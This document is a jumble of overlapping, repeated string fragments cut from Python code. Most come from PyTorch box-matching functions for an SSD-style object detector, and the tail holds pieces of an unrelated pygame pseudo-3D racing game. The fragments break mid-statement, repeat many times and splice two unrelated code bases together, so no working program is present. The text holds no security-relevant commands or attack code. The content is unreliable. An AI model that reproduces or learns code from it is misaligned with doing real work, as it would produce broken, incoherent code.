dbox_indices, threshold + 1)# ensure N!=0 pos_ind = overlaps_per_dbox", "obj_ind overlaps_per_dbox.index_fill_(0, dbox_indices, threshold + 1) # ensure N!=0 pos_ind", ":4], target[:, 4:] # overlaps' shape = (object num, default", "index = 0 for b, target in enumerate(targets): targets_loc, targets_conf", "num, dboxes num) overlaps_per_dbox, object_indices = overlaps.max(dim=0) #object_indices = object_indices.long()", "overlaps.max(dim=0) # object_indices = object_indices.long() # for fancy indexing #", "float, threshold for returned indicator batch_num: (Required) int, batch size", "targets: Tensor, shape is (batch*object num(batch), 4=(cx,cy,w,h)+8=(x1,y1,x2,y2,...)+class_labels) :param dboxes: shape", "4=(cx,cy,w,h)+8=(x1,y1,x2,y2,...)+class_labels) :param dboxes: shape is (default boxes num, 4) IMPORTANT:", "(batch num, dboxes num) overlaps_per_dbox, object_indices = overlaps.max(dim=0) #object_indices =", "for fancy indexing # get maximum overlap values for each", "'box number per image' and 'localization=(cx, cy, w, h)' class_num", "# create returned empty Tensor pos_indicator, matched_targets = torch.empty((batch_num, dboxes_num),", "neg_ind, 4:] = 0 matched_targets[b, neg_ind, -1] = 1 return", "box num). this represents whether each default box is object", "\"\"\" threshold = kwargs.pop('threshold', 0.5) batch_num = kwargs.pop('batch_num') device =", "dbox_ind in enumerate(best_dbox_ind_per_object): best_object_ind_per_dbox[dbox_ind] = object_ind best_overlap_per_dbox.index_fill_(0, best_dbox_ind_per_object, 999) pos_ind", "is (batch*object num(batch), 1+4+class_labels) :param dboxes: shape is (default boxes", "= overlaps_per_dbox > threshold # assign targets matched_targets[b, :, :4],", "= overlaps.max(dim=0) # object_indices = object_indices.long() # for fancy indexing", "= (batch, default box num). this represents whether each default", "number per image' and 'localization=(cx, cy, w, h)' class_num =", "matched_targets[b, neg_ind, -1] = 1 return pos_indicator, matched_targets def matching_strategy_quads(targets,", "target[:, 4:12], target[:, 12:] # overlaps' shape = (object num,", "convert centered coordinated to minmax coordinates dboxes_mm = centroids2corners(dboxes) #", "= 1 return pos_indicator, matched_targets def matching_strategy_quads(targets, dboxes, **kwargs): \"\"\"", "= kwargs.pop('threshold', 0.5) batch_num = kwargs.pop('batch_num') device = dboxes.device dboxes_num", "pos_indicator: Bool Tensor, shape = (batch, default box num). this", "4:] # overlaps' shape = (object num, default box num)", ":return: pos_indicator: Bool Tensor, shape = (batch, default box num).", "enumerate(best_dbox_ind_per_object): best_object_ind_per_dbox[dbox_ind] = object_ind best_overlap_per_dbox.index_fill_(0, best_dbox_ind_per_object, 999) pos_ind = best_overlap_per_dbox", "= overlaps.max(dim=0) for object_ind, dbox_ind in enumerate(best_dbox_ind_per_object): best_object_ind_per_dbox[dbox_ind] = object_ind", "dbox_ind in enumerate(dbox_indices): object_indices[dbox_ind] = obj_ind overlaps_per_dbox.index_fill_(0, dbox_indices, threshold +", ":, :4], matched_targets[b, :, 4:] = targets_loc[object_indices], targets_conf[object_indices] pos_indicator[b] =", "maximum overlap value for each default box # shape =", "object num) overlaps_per_object, dbox_indices = overlaps.max(dim=1) for obj_ind, dbox_ind in", "num, 4) IMPORTANT: Note that means (cx, cy, w, h)", "4+class_num) including background \"\"\" threshold = kwargs.pop('threshold', 0.5) batch_num =", "num(batch), 4=(cx,cy,w,h)+8=(x1,y1,x2,y2,...)+class_labels) :param dboxes: shape is (default boxes num, 4)", "Tensor, shape is (batch*object num(batch), 1+4+class_labels) :param dboxes: shape is", "matching_strategy(targets, dboxes, **kwargs): \"\"\" :param targets: Tensor, shape is (batch*object", "# get maximum overlap value for each default box #", "threshold + 1)# ensure N!=0 pos_ind = overlaps_per_dbox > threshold", "num, object num) overlaps_per_object, dbox_indices = overlaps.max(dim=1) for obj_ind, dbox_ind", "\"\"\" # get maximum overlap value for each default box", "4:] = 0 matched_targets[b, neg_ind, -1] = 1 return pos_indicator,", "= (object num, default box num) overlaps = iou(centroids2corners(targets_loc), dboxes_mm.clone())", "b, target in enumerate(targets): targets_loc, targets_quad, targets_conf = target[:, :4],", "# object_indices = object_indices.long() # for fancy indexing # get", "gt_loc[b], gt_conf[b] = targets[best_object_ind_per_dbox], targets_conf[best_object_ind_per_dbox] neg_ind = torch.logical_not(pos_ind) gt_conf[b, neg_ind]", "best_overlap_per_dbox > threshold pos_indicator[b] = pos_ind gt_loc[b], gt_conf[b] = targets[best_object_ind_per_dbox],", "threshold # assign targets matched_targets[b, :, :4], matched_targets[b, :, 4:]", "set background flag neg_ind = torch.logical_not(pos_ind) matched_targets[b, neg_ind, 12:] =", "threshold = kwargs.pop('threshold', 0.5) batch_num = kwargs.pop('batch_num') device = dboxes.device", "= torch.empty((batch_num, dboxes_num), device=device, dtype=torch.bool), torch.empty((batch_num, dboxes_num, 4 + class_num),", "overlaps_per_dbox, object_indices = overlaps.max(dim=0) # object_indices = object_indices.long() # for", "# convert centered coordinated to minmax coordinates dboxes_mm = centroids2corners(dboxes)", "overlaps.max(dim=0) #object_indices = object_indices.long() # for fancy indexing # get", "# for fancy indexing # get maximum overlap values for", "= torch.logical_not(pos_ind) matched_targets[b, neg_ind, 4:] = 0 matched_targets[b, neg_ind, -1]", ":param kwargs: threshold: (Optional) float, threshold for returned indicator batch_num:", "fancy indexing # get maximum overlap values for each object", "for each default box # shape = (batch num, dboxes", "torch.logical_not(pos_ind) gt_conf[b, neg_ind] = 0 gt_conf[b, neg_ind, -1] = 1", "each default box # shape = (batch num, dboxes num)", "= object_indices.long() # for fancy indexing # get maximum overlap", "targets_conf[best_object_ind_per_dbox] neg_ind = torch.logical_not(pos_ind) gt_conf[b, neg_ind] = 0 gt_conf[b, neg_ind,", "targets_quad, targets_conf = target[:, :4], target[:, 4:12], target[:, 12:] #", "dboxes_num, 4 + 8 + class_num), device=device) # matching for", "(batch num, dboxes num) overlaps_per_dbox, object_indices = overlaps.max(dim=0) # object_indices", "- 4 # convert centered coordinated to minmax coordinates dboxes_mm", ":, 4:12], matched_targets[b, :, 12:] = \\ targets_loc[object_indices], targets_quad[object_indices], targets_conf[object_indices]", "+ 8 + class_num), device=device) # matching for each batch", "for obj_ind, dbox_ind in enumerate(dbox_indices): object_indices[dbox_ind] = obj_ind overlaps_per_dbox.index_fill_(0, dbox_indices,", "targets[best_object_ind_per_dbox], targets_conf[best_object_ind_per_dbox] neg_ind = torch.logical_not(pos_ind) gt_conf[b, neg_ind] = 0 gt_conf[b,", "= 0 matched_targets[b, neg_ind, -1] = 1 return pos_indicator, matched_targets", "neg_ind = torch.logical_not(pos_ind) matched_targets[b, neg_ind, 12:] = 0 matched_targets[b, neg_ind,", "pos_ind = overlaps_per_dbox > threshold # assign targets matched_targets[b, :,", "= obj_ind overlaps_per_dbox.index_fill_(0, dbox_indices, threshold + 1) # ensure N!=0", "kwargs: threshold: (Optional) float, threshold for returned indicator batch_num: (Required)", "device = dboxes.device dboxes_num = dboxes.shape[0] # minus 'box number", "= 0 for b, target in enumerate(targets): targets_loc, targets_conf =", "0 for b, target in enumerate(targets): targets_loc, targets_quad, targets_conf =", "overlaps_per_dbox.index_fill_(0, dbox_indices, threshold + 1) # ensure N!=0 pos_ind =", "0.5) batch_num = kwargs.pop('batch_num') device = dboxes.device dboxes_num = dboxes.shape[0]", "boxes num, 4) IMPORTANT: Note that means (cx, cy, w,", "4:] = targets_loc[object_indices], targets_conf[object_indices] pos_indicator[b] = pos_ind # set background", "shape is (default boxes num, 4) IMPORTANT: Note that means", "batch index = 0 for b, target in enumerate(targets): targets_loc,", "#object_indices = object_indices.long() # for fancy indexing # get maximum", "\"\"\" :param targets: Tensor, shape is (batch*object num(batch), 1+4+class_labels) :param", "= targets[0].shape[1] - 4 # convert centered coordinated to minmax", "is object or background. matched_targets: Tensor, shape = (batch, default", "overlaps' shape = (object num, default box num) overlaps =", "threshold for returned indicator batch_num: (Required) int, batch size :return:", "= overlaps.max(dim=1) for obj_ind, dbox_ind in enumerate(dbox_indices): object_indices[dbox_ind] = obj_ind", "1 \"\"\" # get maximum overlap value for each default", "device=device, dtype=torch.bool), torch.empty((batch_num, dboxes_num, 4 + class_num), device=device) # matching", "class_num = targets[0].shape[1] - 4 - 8 # convert centered", ":, 12:] = \\ targets_loc[object_indices], targets_quad[object_indices], targets_conf[object_indices] pos_indicator[b] = pos_ind", "(batch num, object num) overlaps_per_object, dbox_indices = overlaps.max(dim=1) for obj_ind,", "= pos_ind # set background flag neg_ind = torch.logical_not(pos_ind) matched_targets[b,", "indexing # get maximum overlap values for each object #", "object_indices[dbox_ind] = obj_ind overlaps_per_dbox.index_fill_(0, dbox_indices, threshold + 1) # ensure", "assign targets matched_targets[b, :, :4], matched_targets[b, :, 4:12], matched_targets[b, :,", "4) IMPORTANT: Note that means (cx, cy, w, h) :param", "and 'localization=(cx, cy, w, h)' class_num = targets[0].shape[1] - 4", "centroids2corners, iou def matching_strategy(targets, dboxes, **kwargs): \"\"\" :param targets: Tensor,", "best_object_ind_per_dbox[dbox_ind] = object_ind best_overlap_per_dbox.index_fill_(0, best_dbox_ind_per_object, 999) pos_ind = best_overlap_per_dbox >", "in enumerate(dbox_indices): object_indices[dbox_ind] = obj_ind overlaps_per_dbox.index_fill_(0, dbox_indices, threshold + 1)#", "= overlaps.max(dim=0) #object_indices = object_indices.long() # for fancy indexing #", "centered coordinated to minmax coordinates dboxes_mm = centroids2corners(dboxes) # create", "h)' class_num = targets[0].shape[1] - 4 # convert centered coordinated", "set background flag neg_ind = torch.logical_not(pos_ind) matched_targets[b, neg_ind, 4:] =", "value for each default box # shape = (batch num,", "background flag neg_ind = torch.logical_not(pos_ind) matched_targets[b, neg_ind, 4:] = 0", "best_dbox_ind_per_object = overlaps.max(dim=1) best_overlap_per_dbox, best_object_ind_per_dbox = overlaps.max(dim=0) for object_ind, dbox_ind", "object_indices[dbox_ind] = obj_ind overlaps_per_dbox.index_fill_(0, dbox_indices, threshold + 1)# ensure N!=0", "best_overlap_per_object, best_dbox_ind_per_object = overlaps.max(dim=1) best_overlap_per_dbox, best_object_ind_per_dbox = overlaps.max(dim=0) for object_ind,", "# get maximum overlap values for each object # shape", "enumerate(targets): targets_loc, targets_quad, targets_conf = target[:, :4], target[:, 4:12], target[:,", "8 # convert centered coordinated to minmax coordinates dboxes_mm =", "= \\ targets_loc[object_indices], targets_quad[object_indices], targets_conf[object_indices] pos_indicator[b] = pos_ind # set", ":4], matched_targets[b, :, 4:] = targets_loc[object_indices], targets_conf[object_indices] pos_indicator[b] = pos_ind", "= (batch num, dboxes num) overlaps_per_dbox, object_indices = overlaps.max(dim=0) #object_indices", "'localization=(cx, cy, w, h)' class_num = targets[0].shape[1] - 4 #", "overlap value for each default box # shape = (batch", "box is object or background. matched_targets: Tensor, shape = (batch,", "matched_targets[b, :, 12:] = \\ targets_loc[object_indices], targets_quad[object_indices], targets_conf[object_indices] pos_indicator[b] =", "= overlaps.max(dim=1) best_overlap_per_dbox, best_object_ind_per_dbox = overlaps.max(dim=0) for object_ind, dbox_ind in", "shape = (batch, default box num). this represents whether each", "= targets[0].shape[1] - 4 - 8 # convert centered coordinated", "= centroids2corners(dboxes) # create returned empty Tensor pos_indicator, matched_targets =", "shape is (batch*object num(batch), 1+4+class_labels) :param dboxes: shape is (default", "empty Tensor pos_indicator, matched_targets = torch.empty((batch_num, dboxes_num), device=device, dtype=torch.bool), torch.empty((batch_num,", "= 0 for b, target in enumerate(targets): targets_loc, targets_quad, targets_conf", "pos_indicator[b] = pos_ind # set background flag neg_ind = torch.logical_not(pos_ind)", "targets[0].shape[1] - 4 # convert centered coordinated to minmax coordinates", "= dboxes.shape[0] # minus 'box number per image' and 'localization=(cx,", "dbox_indices = overlaps.max(dim=1) for obj_ind, dbox_ind in enumerate(dbox_indices): object_indices[dbox_ind] =", "values for each object # shape = (batch num, object", "def matching_strategy_quads(targets, dboxes, **kwargs): \"\"\" :param targets: Tensor, shape is", "class_num = targets[0].shape[1] - 4 # convert centered coordinated to", "# ensure N!=0 pos_ind = overlaps_per_dbox > threshold # assign", "= best_overlap_per_dbox > threshold pos_indicator[b] = pos_ind gt_loc[b], gt_conf[b] =", "size :return: pos_indicator: Bool Tensor, shape = (batch, default box", "targets matched_targets[b, :, :4], matched_targets[b, :, 4:] = targets_loc[object_indices], targets_conf[object_indices]", "\"\"\" best_overlap_per_object, best_dbox_ind_per_object = overlaps.max(dim=1) best_overlap_per_dbox, best_object_ind_per_dbox = overlaps.max(dim=0) for", "1 return pos_indicator, matched_targets def matching_strategy_quads(targets, dboxes, **kwargs): \"\"\" :param", "= target[:, :4], target[:, 4:12], target[:, 12:] # overlaps' shape", "overlaps.max(dim=1) best_overlap_per_dbox, best_object_ind_per_dbox = overlaps.max(dim=0) for object_ind, dbox_ind in enumerate(best_dbox_ind_per_object):", "index = 0 for b, target in enumerate(targets): targets_loc, targets_quad,", "neg_ind = torch.logical_not(pos_ind) gt_conf[b, neg_ind] = 0 gt_conf[b, neg_ind, -1]", "matched_targets = torch.empty((batch_num, dboxes_num), device=device, dtype=torch.bool), torch.empty( (batch_num, dboxes_num, 4", "matching for each batch index = 0 for b, target", "in enumerate(targets): targets_loc, targets_quad, targets_conf = target[:, :4], target[:, 4:12],", "class_num), device=device) # matching for each batch index = 0", "neg_ind, -1] = 1 \"\"\" # get maximum overlap value", "object or background. matched_targets: Tensor, shape = (batch, default box", "object_indices = overlaps.max(dim=0) #object_indices = object_indices.long() # for fancy indexing", ":, 4:] = targets_loc[object_indices], targets_conf[object_indices] pos_indicator[b] = pos_ind # set", "target[:, 4:] # overlaps' shape = (object num, default box", "shape is (batch*object num(batch), 4=(cx,cy,w,h)+8=(x1,y1,x2,y2,...)+class_labels) :param dboxes: shape is (default", "cy, w, h)' class_num = targets[0].shape[1] - 4 - 8", "targets_conf = target[:, :4], target[:, 4:12], target[:, 12:] # overlaps'", "# minus 'box number per image' and 'localization=(cx, cy, w,", "(Required) int, batch size :return: pos_indicator: Bool Tensor, shape =", "ensure N!=0 pos_ind = overlaps_per_dbox > threshold # assign targets", "= pos_ind gt_loc[b], gt_conf[b] = targets[best_object_ind_per_dbox], targets_conf[best_object_ind_per_dbox] neg_ind = torch.logical_not(pos_ind)", ":, :4], matched_targets[b, :, 4:12], matched_targets[b, :, 12:] = \\", "= targets_loc[object_indices], targets_conf[object_indices] pos_indicator[b] = pos_ind # set background flag", "w, h) :param kwargs: threshold: (Optional) float, threshold for returned", "dboxes.device dboxes_num = dboxes.shape[0] # minus 'box number per image'", "# shape = (batch num, object num) overlaps_per_object, dbox_indices =", "dboxes: shape is (default boxes num, 4) IMPORTANT: Note that", "= torch.logical_not(pos_ind) gt_conf[b, neg_ind] = 0 gt_conf[b, neg_ind, -1] =", "num) overlaps_per_dbox, object_indices = overlaps.max(dim=0) # object_indices = object_indices.long() #", "threshold pos_indicator[b] = pos_ind gt_loc[b], gt_conf[b] = targets[best_object_ind_per_dbox], targets_conf[best_object_ind_per_dbox] neg_ind", "+ 1)# ensure N!=0 pos_ind = overlaps_per_dbox > threshold #", "shape = (batch, default box num, 4+class_num) including background \"\"\"", "dboxes_num), device=device, dtype=torch.bool), torch.empty((batch_num, dboxes_num, 4 + class_num), device=device) #", "each object # shape = (batch num, object num) overlaps_per_object,", "pos_ind # set background flag neg_ind = torch.logical_not(pos_ind) matched_targets[b, neg_ind,", "> threshold # assign targets matched_targets[b, :, :4], matched_targets[b, :,", "= kwargs.pop('batch_num') device = dboxes.device dboxes_num = dboxes.shape[0] # minus", "dboxes num) overlaps_per_dbox, object_indices = overlaps.max(dim=0) #object_indices = object_indices.long() #", ":4], matched_targets[b, :, 4:12], matched_targets[b, :, 12:] = \\ targets_loc[object_indices],", "target[:, 12:] # overlaps' shape = (object num, default box", "gt_conf[b, neg_ind] = 0 gt_conf[b, neg_ind, -1] = 1 \"\"\"", "targets_loc, targets_quad, targets_conf = target[:, :4], target[:, 4:12], target[:, 12:]", "**kwargs): \"\"\" :param targets: Tensor, shape is (batch*object num(batch), 1+4+class_labels)", "in enumerate(dbox_indices): object_indices[dbox_ind] = obj_ind overlaps_per_dbox.index_fill_(0, dbox_indices, threshold + 1)", "per image' and 'localization=(cx, cy, w, h)' class_num = targets[0].shape[1]", "from ....data.utils.boxes import centroids2corners, iou def matching_strategy(targets, dboxes, **kwargs): \"\"\"", "default box num) overlaps = iou(centroids2corners(targets_loc), dboxes_mm.clone()) \"\"\" best_overlap_per_object, best_dbox_ind_per_object", "# assign targets matched_targets[b, :, :4], matched_targets[b, :, 4:] =", "for object_ind, dbox_ind in enumerate(best_dbox_ind_per_object): best_object_ind_per_dbox[dbox_ind] = object_ind best_overlap_per_dbox.index_fill_(0, best_dbox_ind_per_object,", "iou def matching_strategy(targets, dboxes, **kwargs): \"\"\" :param targets: Tensor, shape", "Tensor pos_indicator, matched_targets = torch.empty((batch_num, dboxes_num), device=device, dtype=torch.bool), torch.empty((batch_num, dboxes_num,", "= (batch num, object num) overlaps_per_object, dbox_indices = overlaps.max(dim=1) for", "iou(centroids2corners(targets_loc), dboxes_mm.clone()) \"\"\" best_overlap_per_object, best_dbox_ind_per_object = overlaps.max(dim=1) best_overlap_per_dbox, best_object_ind_per_dbox =", "in enumerate(targets): targets_loc, targets_conf = target[:, :4], target[:, 4:] #", "targets_conf = target[:, :4], target[:, 4:] # overlaps' shape =", "num(batch), 1+4+class_labels) :param dboxes: shape is (default boxes num, 4)", "matched_targets[b, neg_ind, 4:] = 0 matched_targets[b, neg_ind, -1] = 1", "h) :param kwargs: threshold: (Optional) float, threshold for returned indicator", "4 + class_num), device=device) # matching for each batch index", "torch.empty((batch_num, dboxes_num, 4 + class_num), device=device) # matching for each", "overlaps_per_object, dbox_indices = overlaps.max(dim=1) for obj_ind, dbox_ind in enumerate(dbox_indices): object_indices[dbox_ind]", "device=device, dtype=torch.bool), torch.empty( (batch_num, dboxes_num, 4 + 8 + class_num),", "dboxes_mm.clone()) \"\"\" best_overlap_per_object, best_dbox_ind_per_object = overlaps.max(dim=1) best_overlap_per_dbox, best_object_ind_per_dbox = overlaps.max(dim=0)", "best_dbox_ind_per_object, 999) pos_ind = best_overlap_per_dbox > threshold pos_indicator[b] = pos_ind", "whether each default box is object or background. matched_targets: Tensor,", "dbox_indices, threshold + 1)# ensure N!=0 pos_ind = overlaps_per_dbox >", "1) # ensure N!=0 pos_ind = overlaps_per_dbox > threshold #", "pos_indicator, matched_targets def matching_strategy_quads(targets, dboxes, **kwargs): \"\"\" :param targets: Tensor,", "matched_targets: Tensor, shape = (batch, default box num, 4+class_num) including", "object_indices = object_indices.long() # for fancy indexing # get maximum", "object_indices.long() # for fancy indexing # get maximum overlap values", "return pos_indicator, matched_targets def matching_strategy_quads(targets, dboxes, **kwargs): \"\"\" :param targets:", "for b, target in enumerate(targets): targets_loc, targets_quad, targets_conf = target[:,", "\\ targets_loc[object_indices], targets_quad[object_indices], targets_conf[object_indices] pos_indicator[b] = pos_ind # set background", "**kwargs): \"\"\" :param targets: Tensor, shape is (batch*object num(batch), 4=(cx,cy,w,h)+8=(x1,y1,x2,y2,...)+class_labels)", "targets_conf[object_indices] pos_indicator[b] = pos_ind # set background flag neg_ind =", "(default boxes num, 4) IMPORTANT: Note that means (cx, cy,", "(batch*object num(batch), 1+4+class_labels) :param dboxes: shape is (default boxes num,", "for each batch index = 0 for b, target in", "- 8 # convert centered coordinated to minmax coordinates dboxes_mm", "threshold # assign targets matched_targets[b, :, :4], matched_targets[b, :, 4:12],", "threshold: (Optional) float, threshold for returned indicator batch_num: (Required) int,", "returned indicator batch_num: (Required) int, batch size :return: pos_indicator: Bool", "= (batch, default box num, 4+class_num) including background \"\"\" threshold", "= 1 \"\"\" # get maximum overlap value for each", "-1] = 1 \"\"\" # get maximum overlap value for", "def matching_strategy(targets, dboxes, **kwargs): \"\"\" :param targets: Tensor, shape is", "shape = (object num, default box num) overlaps = iou(centroids2corners(targets_loc),", "Bool Tensor, shape = (batch, default box num). this represents", "gt_conf[b] = targets[best_object_ind_per_dbox], targets_conf[best_object_ind_per_dbox] neg_ind = torch.logical_not(pos_ind) gt_conf[b, neg_ind] =", "coordinates dboxes_mm = centroids2corners(dboxes) # create returned empty Tensor pos_indicator,", "w, h)' class_num = targets[0].shape[1] - 4 - 8 #", "empty Tensor pos_indicator, matched_targets = torch.empty((batch_num, dboxes_num), device=device, dtype=torch.bool), torch.empty(", "# set background flag neg_ind = torch.logical_not(pos_ind) matched_targets[b, neg_ind, 12:]", "dboxes, **kwargs): \"\"\" :param targets: Tensor, shape is (batch*object num(batch),", "= dboxes.device dboxes_num = dboxes.shape[0] # minus 'box number per", "dboxes.shape[0] # minus 'box number per image' and 'localization=(cx, cy,", "gt_conf[b, neg_ind, -1] = 1 \"\"\" # get maximum overlap", "neg_ind, 12:] = 0 matched_targets[b, neg_ind, -1] = 1 return", "12:] = \\ targets_loc[object_indices], targets_quad[object_indices], targets_conf[object_indices] pos_indicator[b] = pos_ind #", "num, dboxes num) overlaps_per_dbox, object_indices = overlaps.max(dim=0) # object_indices =", "num) overlaps_per_dbox, object_indices = overlaps.max(dim=0) #object_indices = object_indices.long() # for", "box num, 4+class_num) including background \"\"\" threshold = kwargs.pop('threshold', 0.5)", "box num) overlaps = iou(centroids2corners(targets_loc), dboxes_mm.clone()) \"\"\" best_overlap_per_object, best_dbox_ind_per_object =", "targets_quad[object_indices], targets_conf[object_indices] pos_indicator[b] = pos_ind # set background flag neg_ind", "dboxes_num = dboxes.shape[0] # minus 'box number per image' and", "centroids2corners(dboxes) # create returned empty Tensor pos_indicator, matched_targets = torch.empty((batch_num,", "default box num). this represents whether each default box is", "device=device) # matching for each batch index = 0 for", "flag neg_ind = torch.logical_not(pos_ind) matched_targets[b, neg_ind, 12:] = 0 matched_targets[b,", "create returned empty Tensor pos_indicator, matched_targets = torch.empty((batch_num, dboxes_num), device=device,", "matched_targets = torch.empty((batch_num, dboxes_num), device=device, dtype=torch.bool), torch.empty((batch_num, dboxes_num, 4 +", "targets[0].shape[1] - 4 - 8 # convert centered coordinated to", "background flag neg_ind = torch.logical_not(pos_ind) matched_targets[b, neg_ind, 12:] = 0", "0 matched_targets[b, neg_ind, -1] = 1 return pos_indicator, matched_targets def", "batch size :return: pos_indicator: Bool Tensor, shape = (batch, default", "4 + 8 + class_num), device=device) # matching for each", "is (default boxes num, 4) IMPORTANT: Note that means (cx,", "default box # shape = (batch num, dboxes num) overlaps_per_dbox,", "= 0 gt_conf[b, neg_ind, -1] = 1 \"\"\" # get", "IMPORTANT: Note that means (cx, cy, w, h) :param kwargs:", "dboxes_num, 4 + class_num), device=device) # matching for each batch", "1)# ensure N!=0 pos_ind = overlaps_per_dbox > threshold # assign", ":param targets: Tensor, shape is (batch*object num(batch), 4=(cx,cy,w,h)+8=(x1,y1,x2,y2,...)+class_labels) :param dboxes:", "matched_targets[b, :, 4:] = targets_loc[object_indices], targets_conf[object_indices] pos_indicator[b] = pos_ind #", "neg_ind = torch.logical_not(pos_ind) matched_targets[b, neg_ind, 4:] = 0 matched_targets[b, neg_ind,", "target[:, :4], target[:, 4:] # overlaps' shape = (object num,", "in enumerate(best_dbox_ind_per_object): best_object_ind_per_dbox[dbox_ind] = object_ind best_overlap_per_dbox.index_fill_(0, best_dbox_ind_per_object, 999) pos_ind =", "targets_loc[object_indices], targets_conf[object_indices] pos_indicator[b] = pos_ind # set background flag neg_ind", "- 4 - 8 # convert centered coordinated to minmax", "best_object_ind_per_dbox = overlaps.max(dim=0) for object_ind, dbox_ind in enumerate(best_dbox_ind_per_object): best_object_ind_per_dbox[dbox_ind] =", "(batch, default box num, 4+class_num) including background \"\"\" threshold =", "num) overlaps = iou(centroids2corners(targets_loc), dboxes_mm.clone()) \"\"\" best_overlap_per_object, best_dbox_ind_per_object = overlaps.max(dim=1)", "torch.logical_not(pos_ind) matched_targets[b, neg_ind, 4:] = 0 matched_targets[b, neg_ind, -1] =", "minus 'box number per image' and 'localization=(cx, cy, w, h)'", "= obj_ind overlaps_per_dbox.index_fill_(0, dbox_indices, threshold + 1)# ensure N!=0 pos_ind", "kwargs.pop('threshold', 0.5) batch_num = kwargs.pop('batch_num') device = dboxes.device dboxes_num =", "each batch index = 0 for b, target in enumerate(targets):", "enumerate(targets): targets_loc, targets_conf = target[:, :4], target[:, 4:] # overlaps'", "# matching for each batch index = 0 for b,", "4:12], target[:, 12:] # overlaps' shape = (object num, default", "batch_num = kwargs.pop('batch_num') device = dboxes.device dboxes_num = dboxes.shape[0] #", "this represents whether each default box is object or background.", "num, default box num) overlaps = iou(centroids2corners(targets_loc), dboxes_mm.clone()) \"\"\" best_overlap_per_object,", "torch.empty( (batch_num, dboxes_num, 4 + 8 + class_num), device=device) #", "pos_ind gt_loc[b], gt_conf[b] = targets[best_object_ind_per_dbox], targets_conf[best_object_ind_per_dbox] neg_ind = torch.logical_not(pos_ind) gt_conf[b,", "kwargs.pop('batch_num') device = dboxes.device dboxes_num = dboxes.shape[0] # minus 'box", "overlaps.max(dim=1) for obj_ind, dbox_ind in enumerate(dbox_indices): object_indices[dbox_ind] = obj_ind overlaps_per_dbox.index_fill_(0,", "for b, target in enumerate(targets): targets_loc, targets_conf = target[:, :4],", "Tensor, shape = (batch, default box num). this represents whether", "torch.logical_not(pos_ind) matched_targets[b, neg_ind, 12:] = 0 matched_targets[b, neg_ind, -1] =", "best_overlap_per_dbox.index_fill_(0, best_dbox_ind_per_object, 999) pos_ind = best_overlap_per_dbox > threshold pos_indicator[b] =", "+ 1) # ensure N!=0 pos_ind = overlaps_per_dbox > threshold" ]
[ "-= sky.rect.width * 2 for hill in self.bg_hills: hill.rect.left +=", "Exception as e: #print '-' * 60 pass def rd_sprts_render(self,", "220 }, 'COLUMN': { 'x': 995, 'y': 5, 'w': 200,", "{ 'x': 5, 'y': 5, 'w': 215, 'h': 540 },", "self.d, zc1) xsr2 = self.xp_to_xs(xpr2, self.w) xpr3 = self.xc_to_xp(xcr3, self.d,", "[x4, d-y4], [x1, d-y1]] c = utils.clr_from_str(color) try: self.pygm.draw.polygon(self.surf, c,", "draw a circle\"\"\" #theta_i = math.pi /180.0 * 0.1 #theta_i", "int(math.floor(pos / self.seg_len)) #i = int(math.ceil(pos / self.seg_len)) seg_n =", "0 return obj = sprt.get('obj') if not obj: # None", "= yc * (d / zc) return yp def xp_to_xs(self,", "a = float(curve) / rad #a *= 10.0 #print a", "/ self.road.speed_max self.spd.progress(spdc) class FPSceneA(pygm.PyGMScene): def __init__(self, *args, **kwargs): super(FPSceneA,", "the cloud for sky in self.bg_sky: sky.rect.left -= 1#self.sky_speed if", "num segments 'CURVE': {'NONE': 0, 'EASY': 2, 'MEDIUM': 4, 'HARD':", "{'imgs': ['img_sprts/clown1.png'], 'score': -100,}, } class SptTmpx(sptdraw.SptDrawBase): def __init__(self, size,", "e_keys_dn, e_keys_up): if 0 in e_keys_dn: self.player_go = 1 elif", "self.util_curve_percent_remaining(self.position, self.seg_len) dx_curve = - (b_curve * b_percent) x_curve =", "0 # 0:- 1:^ 2:v self.speed_dt_up = 1.0#2.0#3.0 self.speed_dt_dn =", "'y': 897, 'w': 298, 'h': 190 }, 'BOULDER2': { 'x':", "* 2 class FPSptRoadMap(sptdraw.SptDrawBase): def __init__(self, size, segs, rad, *args,", "num, num, 0, 0) self.add_road(num, num, num, 0, height/2.0) self.add_road(num,", "= 240 self.road.rect.left = 0 self.disp_add(self.road) self.disp_add(self.car) self.rdmap = FPSptRoadMap((480,", "= (len(self.segments) - self.seg_draw_n) * self.seg_len def seg_lasy_y(self): seg_n =", "**kwargs): #self.fill(self.c) d = 2 n = self.h / d", "''' # grass self.render_polygon(None, 0, ys1, self.w, ys2, self.w, ys4,", "0: hill.rect.left += hill.rect.width * 2 if hill.rect.left - hill.rect.width", "self.c, rct) class FPSptRdSprts(pygm.SptImg): def __init__(self, img_file, *args, **kwargs): super(FPSptRdSprts,", "add_road(self, enter, hold, leave, curve, yw=0.0): #print enter, hold, leave,", "= self.xp_to_xs(xpl2, self.w) xpl3 = self.xc_to_xp(xcl3, self.d, zc2) xsl3 =", "== 2: sprt_at = 580 elif x_i == 3: sprt_at", "FP_COLORS['START_Y'] for i in range(n): self.segments[i]['color'] = FP_COLORS['START_Y'] def rd_sprts_init_rand(self,", "self.xc = 0.0 self.yc = 0.0 self.zc = 0.0 ##", "{} for k, v in seg.items(): if k not in", "sky.rect.width * 2 if sky.rect.left - sky.rect.width > 0: sky.rect.left", "ys4, xs3, ys3, seg['color']['road']) if 1:#i % 2 == 1:", "check score once for a segment seg_i = self.player_seg['index'] if", "events, *args, **kwargs): #return events r_events = [] for event", "= True self.game_score = -1.0 def check_score(self): # make sure", "self.w) yp1 = self.yc_to_yp(yc, self.d, zc1) ys1 = self.yp_to_ys(yp1, self.h)", "self.util_ease_out(start_y, end_y, float(n)/total)) for n in range(hold): self.rd_seg_add(curve, self.util_ease_out(start_y, end_y,", "480, 'w': 80, 'h': 41 }, 'PLAYER_RIGHT': { 'x': 995,", "300, 'h': 170 }, 'BILLBOARD06': { 'x': 488, 'y': 555,", "p < 0.8: # curve = 0.0 # yw =", "= self.yp_to_ys(yp3, self.h) ys4 = ys3 self.render_polygon(None, 0, ys1, self.w,", "zc1) xsr1 = self.xp_to_xs(xpr1, self.w) xpr2 = self.xc_to_xp(xcr2, self.d, zc1)", "NOTE: not used now !! ##x_i = 2 y_sprt =", "end_y, (float(n)+enter+hold)/total)) def add_curves(self): self.add_road(FP_ROAD['LENGTH']['MEDIUM'], FP_ROAD['LENGTH']['MEDIUM'], FP_ROAD['LENGTH']['MEDIUM'], -FP_ROAD['CURVE']['EASY']) self.add_road(FP_ROAD['LENGTH']['MEDIUM'], FP_ROAD['LENGTH']['MEDIUM'],", "self.player_di == 1: 